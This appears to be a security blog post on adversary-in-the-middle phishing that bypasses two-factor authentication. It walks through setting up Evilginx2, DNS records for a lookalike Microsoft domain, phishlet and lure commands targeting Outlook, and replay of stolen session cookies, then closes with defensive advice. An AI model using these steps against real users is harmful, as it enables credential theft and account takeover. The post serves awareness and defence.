Due to the increasing number of cyberattacks, particularly zero days, organizations are scrambling to obtain the best security services available. While even the smallest organization might feel that implementing Two-Factor Authentication (2FA) will keep its data secure, a targeted attack from a nefarious threat actor could lure an employee into clicking and opening a malicious document.
In this blog, we will detail the steps of such an attack using the Adversary In The Middle (AITM) phishing attack method.
First, let's understand how an Adversary In The Middle (AITM, also known as Man In The Middle (MITM), phishing attack works.
This process involves sending an email specifically crafted for the victim. Once clicked and opened, the malicious email redirects the victim to a site that is identical to the application that the victim believes needs to be accessed. The web server used by the attacker is then used to proxy all the HTTP packets being sent to and from the target application server.
The phishing page acts as an AITM agent using two TLS sessions: One session connects to the victim, and the other session connects to the target server. Once the victim is connected to the server, the attacker can steal passwords and session cookies. Session cookies are provided to the user by the target webserver to show that it has an authenticated session and does not need reauthentication for every page it visits. The attacker then uses the stolen session cookie to replay the authenticated instance, thereby gaining access to the user's email account and bypassing any authentication processes, including 2FA.
Figure 1: Flow of the attack
Microsoft has a blog which contains additional details about how this tactic was used in a Business Email Compromise (BEC) campaign this year.
For research purposes, let us look at how to perform this attack. In modeling this attack I used Evilgnx2, a framework designed for AITM attacks.
The Attack
First, a little social engineering. Create a domain capable of tricking the target into thinking they are on the correct website. For this research, I used miscrsoft.co. It’s low cost makes it easy for threat actors to purchase.
An external host to the Internet is required which will be configured with steps for the attack provided here: https://github.com/kgretzky/evilginx2
Next, type in the following commands to download and set evilginx2:
sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
run using evilginx -p ./phishlets/
Figure 2: Running Evilginx2
Now that Evilginx2 has been set, prepare the domain. Since we are targeting Outlook in this example, we need to add the appropriate A records.
I set Namesaver records and A records in my domain admin portal.
Nameserver records:
Ns1.miscrsoft.co -> external_server_ip
Ns2.miscrsoft.co -> external_server_ip
A records:
account.miscrsoft.co -> external_server_ip
outlook.miscrsoft.co -> external_server_ip
login.miscrsoft.co -> external_server_ip
Both the Namesaver and A records can be changed, based on the applications being attacked.
Next, set up Phishlet for Outlook since this is the target in our research. Run the following commands on Evilginx2:
config domain miscrsoft.co
config ip external_server_ip
phishlets hostname outlook miscrsoft.co
phishlets enable outlook
lures create outlook
lures get-url 0
After running the commands, all SSL certs should be set up, giving the attacker a fully functional phishing URL to be sent to the victim’s email.
This is how the URL will appear to the victim:
Figure 3: Phishing website page
This page is identical to the legitimate website. The phishing page has an added secure connection so that the victim will not know it’s a phishing page.
Once the password is entered, the victim receives a prompt for 2FA.
Figure 4: Prompt for 2FA
After 2FA credentials are entered, the user is sent to their valid Outlook inbox.
Figure 5: The victim’s valid Outlook inbox.
The attacker has now captured the victim’s account, password, and session token in plaintext, all of which can be seen via Evilginx2.
Figure 6: Captured username and password
Figure 7: Account accessed
Using Cookie Editor, we can copy the session and paste it into a browser gaining access to the account without further authorization.
Conclusion
As you can see, 2FA can be bypassed. However, with additional email security measures in place such attacks can be minimized or prevented. Organizations must implement stringent email security measures to hedge against phishing attacks. Restricting access to accounts, trusted devices and IPs, along with monitoring traffic and flagging malicious behavior can aid in preventing a successful phishing attack. Additionally, cybersecurity teams must monitor for anomalies such as sign-ins from different IP’s or locations to assist in preventing compromises.
It is important to note that this attack will not work on Universal 2nd Factor Authentication (U2F) implementation, due to hardware keys which verify the login URL and prevent 2FA tokens from being issued for malicious URLs.
